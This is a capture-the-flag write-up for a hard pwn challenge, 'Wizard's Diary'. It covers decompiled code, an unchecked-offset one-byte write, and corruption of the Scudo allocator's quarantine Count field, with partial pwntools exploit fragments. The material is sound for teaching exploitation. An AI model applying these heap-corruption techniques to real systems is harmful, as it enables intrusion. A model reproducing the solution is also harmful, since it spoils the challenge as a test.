Wizard's Diary
Wizard's Diary
Difficulty: Hard
Classification: Official
Synopsis
Wizard's Diary is a Hard pwn challenge that features the Scudo Allocator's quarantine
implementation and the corrupting of this structure to gain a Write-Where-Ptr primitive.
Skills Learned
Scudo Allocator
Analysis
We are given a Dockerfile which loads a binary wizards_diary and serves it. We see in
run.sh that some additional options are listed:
$ cat run.sh
export
SCUDO_OPTIONS="thread_local_quarantine_size_kb=64:quarantine_size_kb=256:quaran
tine_max_chunk_size=2048"
export LD_PRELOAD="./libscudo.so"
./wizards_diary
There is another .so library file provided to us through LD_PRELOAD called libscudo.so , and it
seems to use the SCUDO_OPTIONS environment variable. Some research tells us that the Scudo
Allocator is a hardened allocator that "provides additional mitigation against heap based
vulnerabilities, while maintaining good performance". Among other things, it is the default
allocator for Android 11. We'll analyse this again in more depth later.
Protections
We'll start with a checksec :
As we can see:
Decompilation
main()
Classic setup for a heap note challenge:
int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
{
int choice; // [rsp+8h] [rbp-8h]
int not_suitable; // [rsp+Ch] [rbp-4h]
not_suitable = 0;
setup(argc, argv, envp);
puts("=*=*= Welcome to University of Magic! =*=*=");
puts("This app was created to aid the learning process of new magicians!");
login();
for ( choice = get_option(); ; choice = get_option() )
{
if ( !choice )
{
puts("Leaving University...");
exit(0);
}
if ( choice == 1337 )
{
if ( *(_DWORD *)(logged_in_magician + 4) && *(_DWORD *)logged_in_magician
)
{
system("cat flag.txt");
exit(1337);
}
puts("You are not admin!");
}
else
{
if ( choice > 1337 )
goto LABEL_20;
if ( choice == 4 )
{
show_note();
continue;
}
if ( choice > 4 )
goto LABEL_20;
if ( choice != 3 )
{
if ( choice == 1 )
{
new_note();
continue;
}
if ( choice == 2 )
{
remove_note();
continue;
}
LABEL_20:
puts("There is no such option!");
continue;
}
if ( not_suitable )
{
puts("It seems you are not suitable to be in here...");
exit(-2);
}
fix_note();
not_suitable = 1;
}
}
}
Call login()
If 0 , quit
If 1 , call new_note()
If 2 , call remove_note()
If 4 , call show_note()
If 1337 (secret option), perform a check and read flag.txt if it's passed
Obviously, the last one is of the most interest here, but let's go in order.
login()
After come cleaning up, it looks like this:
canary = __readfsqword(0x28u);
printf("Name: ");
fgets(name, 32, stdin);
if ( strcmp(name, "guest\n") )
{
if ( !strcmp(name, "admin\n") )
puts("If you are indeed the admin, you won't have problem changing your
account from guest to admin, right?");
exit(0);
}
new_magician = (char *)malloc(8008uLL);
*(_DWORD *)new_magician = 0;
*((_DWORD *)new_magician + 1) = 0;
printf("Enter a comment to your guest account: ");
fgets(new_magician + 8, 8000, stdin);
logged_in_magician = (__int64)new_magician;
}
The user is asked for a name . If it's not guest , it quits. If it is, a chunk of size 8008 is allocated
and the first 8 bytes of it are nulled out. A new comment is asked for, and the results is read into
the remaining 8000 bytes of the allocated chunk.
This looks like an allocation for a magician struct . We don't know what the first 8 bytes are, but
they seem to be treated as two DWORDs, so we'll set it to two integers for now:
struct Magician {
int a;
int b;
char comment[8000];
}
The compilation looks cleaner once the types are changes to magician * :
canary = __readfsqword(0x28u);
printf("Name: ");
fgets(name, 32, stdin);
if ( strcmp(name, "guest\n") )
{
if ( !strcmp(name, "admin\n") )
puts("If you are indeed the admin, you won't have problem changing your
account from guest to admin, right?");
exit(0);
}
new_magician = (Magician *)malloc(0x1F48uLL);
new_magician->a = 0;
new_magician->b = 0;
printf("Enter a comment to your guest account: ");
fgets(new_magician->comment, 0x1F40, stdin);
logged_in_magician = new_magician;
}
get_option()
__int64 get_option()
{
unsigned int opt; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 canary; // [rsp+8h] [rbp-8h]
canary = __readfsqword(0x28u);
opt = 0;
menu();
__isoc99_scanf("%d", &opt);
return opt;
}
No vulnerabilities here.
new_note()
canary = __readfsqword(0x28u);
idx = 0;
while ( notes[idx] )
{
if ( (int)++idx > 15 )
{
puts("You can't add more notes!");
return;
}
}
chnk = (int *)malloc(0x10uLL);
size = 0;
printf("Size of note: ");
__isoc99_scanf("%d", &size);
*chnk = size;
*((_QWORD *)chnk + 1) = malloc(*chnk);
if ( !*((_QWORD *)chnk + 1) )
{
puts("Malloc error!");
exit(-1);
}
printf("Note: ");
read(0, *((void **)chnk + 1), *chnk);
printf("Added note with idx %d \n", idx);
notes[idx] = chnk;
}
It allocates a new chunk. The first 8 bytes contain the size, the second 8 bytes contain a pointer to
another chunk that contains the data. A struct Note , it looks like:
struct Note {
long size;
char *data;
}
It seems as if there is an alignment thrown in, because setting it to be a long results in a lot of
SLODWORD macros around. Instead I'll make it an int , and have another int junk around:
struct Note {
int size;
int junk;
char *data;
}
With these modifications, it looks like this:
canary = __readfsqword(0x28u);
idx = 0;
while ( notes[idx] )
{
if ( (int)++idx > 15 )
{
puts("You can't add more notes!");
return;
}
}
note = (Note *)malloc(0x10uLL);
size = 0;
printf("Size of note: ");
__isoc99_scanf("%d", &size);
note->size = size;
note->data = (char *)malloc(note->size);
if ( !note->data )
{
puts("Malloc error!");
exit(-1);
}
printf("Note: ");
read(0, note->data, note->size);
printf("Added note with idx %d \n", idx);
notes[idx] = note;
}
remove_note()
canary = __readfsqword(0x28u);
idx = 0;
printf("Index of note: ");
__isoc99_scanf("%d", &idx);
if ( idx <= 0xF && notes[idx] )
{
free((void *)notes[idx]);
notes[idx] = 0LL;
puts("Removed!");
}
else
{
puts("Wrong index");
}
}
Simply removes a note, freeing the Note struct and nulling out the index. Note that the data field
of the Note struct is not freed, however.
fix_note()
canary = __readfsqword(0x28u);
idx = 0;
offset = 0;
printf("Index of note: ");
__isoc99_scanf("%d", &idx);
if ( idx <= 0xF && notes[idx] )
{
printf("Offset to fix: ");
__isoc99_scanf("%d", &offset);
getchar();
printf("Correct byte: ");
__isoc99_scanf("%c", ¬es[idx]->data[offset]);
puts("Fixed!");
}
else
{
puts("Wrong index");
}
}
Here is the start of the bugs. A note index is asked for, and then an offset. data[offset] is then
modified based on user input, but offset is not checked to be in the 0-8000 range, allowing for a
single-byte relative write. Remember that once fix_note() is called, it can't be called again.
show_note()
canary = __readfsqword(0x28u);
idx = 0;
offset = 0;
printf("Index of note: ");
__isoc99_scanf("%d", &idx);
if ( idx <= 0xF && notes[idx] )
{
printf("Offset to show: ");
__isoc99_scanf("%d", &offset);
getchar(); // consume newline
printf("Byte: ");
printf("%c\n", (unsigned int)notes[idx]->data[offset]);
}
else
{
puts("Wrong index");
}
}
Exact same vulnerability, but this time for reading. This is not restricted by only being available
once.
Summary
If we go back to main() , we can again see the criteria for entering 1337 using our newly-modified
structs:
if ( choice == 1337 )
{
if ( logged_in_magician->b && logged_in_magician->a )
{
system("cat flag.txt");
exit(1337);
}
puts("You are not admin!");
}
An initial thought could be to overwrite a and b with the arbitrary write, but we only have one!
We need a different approach.
thread_local_quarantine_size_kb=64
quarantine_size_kb=256
quarantine_max_chunk_size=2048
It seems like we're using Scudo's quarantine functionality. The last option
quarantine_max_chunk_size ensure it's used for struct Note allocations, but not struct
Magician allocations (which are 8008 bytes). Whether or not it's used for the data part of Note
structs depends on which size value we input.
Scudo Quarantines are superseded by ARM MTE, which comes in the latest Android versions. The
official Scudo documentation has the following to say about quarantining:
The Quarantine: offers a way to delay the deallocation operations, preventing blocks to be
immediately available for reuse. Blocks held will be recycled once certain size criteria are
reached. This is essentially a delayed freelist which can help mitigate some use-after-free
situations. This feature is fairly costly in terms of performance and memory footprint, is
mostly controlled by runtime options and is disabled by default.
struct QuarantineBatch {
// With the following count, a batch (and the header that protects it) occupy
// 4096 bytes on 32-bit platforms, and 8192 bytes on 64-bit.
static const u32 MaxCount = 1019;
QuarantineBatch *Next;
uptr Size;
u32 Count;
void *Batch[MaxCount];
}
QuarantineBatch structs are in a linked list stored in a QuarantineCache struct. This excellent
un1fuzz article describes the structure of the quarantine-related classes; each QuarantineBatch
stores
A Size variable which is the total sized of quarantined nodes recorded in this batch PLUS the
size of the QuarantineBatch itself
Count , which keeps track of how many nodes are in the Batch array
This QuarantineBatch structure is stored on the heap, along with all of our chunks as well. When
a user frees a chunk, the push_back() function will be called. push_back() is responsible for
adding a pointer to this chunk in the structure:
void push_back(void *Ptr, uptr Size) {
Batch[Count++] = Ptr;
this->Size += Size;
}
The latest version of the quarantine has a check to ensure that Count < MaxCount , but that was
not there at the time of the challenge release (thankfully!):
DCHECK_LT(Count, MaxCount);
Finally, Scudo also randomises allocation locations, as if the other defences weren't enough.
Exploitation
Plan
We want to overwrite the two integers (combined one QWORD ) at the location of
logged_in_magician with something that isn't null. To do this, we will use the singular one-byte
overwrite and target the Count element of the QuarantineBatch structure to point to
logged_in_magician->a . On freeing, it will write a heap address to this location, which will make
both a and b non-null, passing the check and allowing us to receive the flag.
Setup
Normal setup of helper functions:
p = remote('127.0.0.1' , 1337)
def remove_note(idx):
p.sendlineafter(b'> ', b'2')
p.sendlineafter(b':', str(idx).encode())
p.recvuntil(b'Byte: ')
b = p.recvline().rstrip()
return b
# basic setup
p.sendlineafter(b'Name: ', b'guest')
# comment, located 8 bytes after the desirable location
p.sendline(b'i'*8)
Let's debug this. Scudo doesn't use the heap so vis_heap_chunks won't show it, but we can
search writeable regions in GDB:
If we print out large chunks of this region, everything appears to be null, so let's look at the 4
value for Count and see where that is. We'll assume it's in the same region:
So:
Batch[0] at 0x7f1785e0b028
Now we just need to work out the offset from Batch[0] to logged_in_magician->a , which is
0x3fe8 . That's 0x7fd QWORDs, so the index we want to write Count to is 0x7fd .
Remember, we can only write one byte. What we're going to do is we'll write the higher byte - the
0x7 - to the second LSB of Count , making it 0x704 . We can then allocate + free 0xff chunks
afterwards to gradually increment the 0x704 over to 0x7fd .
One more thing to note: this offset is not constant. In fact, Scudo allocates chunks in a random
position and reuses chunks at random times to combat heap exploits. We'll have to calculate this
distance dynamically, and to do this we'll abuse the byte read functionality. We'll start at 0 and
keep iterating until we find an i character (the start of logged_in_magician->a ) and until we
also find a \x04 byte (the Count ).
batch_0 = 0
comment = 0
i = 0
# found `Count`!
if c == b'\x04':
log.success(f'Found Count at i = {i}!')
# Batch[0] is 8 after Count
batch_0 = i + 8
# found our `comment`!
elif c == b'i':
log.success(f'Found comment at i = {i}!')
# a is 8 before comment
comment = i - 8
Occasionally the comment will be lower in memory than Count , in which case this is not possible,
so we exit early:
Then we worked out how many indices that would have to be:
idx_count = offset // 8
This is the value we want to write to the second LSB of Count . We'll do that now with our one
write:
log.info(f'Lots of frees')
Note that we only have one loop that allocates and frees immediately here. This is not as reliable
as 0xff allocations followed by 0xff frees as it can reuse chunks, but we are allowed a
maximum of 15 chunks at any one time so we'll have to deal with it.
Finally, send 1337 and get the flag!
# get flag
log.info('Printing Flag...')
p.sendlineafter(b'> ', b'1337')
flag = p.recvline().decode()
log.success(f'Flag: {flag}'
The exploit works perfectly, but not with 100% success rate due to aforementioned randomisation
problems:
We get the fake flag! Now we just have to transfer it remotely and grab the actual flag. It takes a
while (and a few tries), but eventually the flag comes back.
Improving Efficiency
The exploit takes a while, so there's something we can do to speed it up. Count is always 16-byte
aligned, so we can increase i by 16 each times rather than 8 . comment , on the other hand,
always ends in an 8 in hex - it's always 8 more than a 16-byte alignment. That's not a problem -
we can increment by 16 each time, and once we find Count we can increment by 8 once to shift
the incrementing. We can also initialise i as 8176 , as that's the arbitrary size of the Note data
in the first place, so it must be greater than that. The former drops the time taken by an average of
50%, and the latter drops it yet further (by 8176 // 16 = 511 requests, in fact).
i += 16
c = show_note(0, i)
# found `Count`!
if c == b'\x04':
log.success(f'Found Count at i = {i}!')
# Batch[0] is 8 after Count
batch_0 = i + 8
i += 8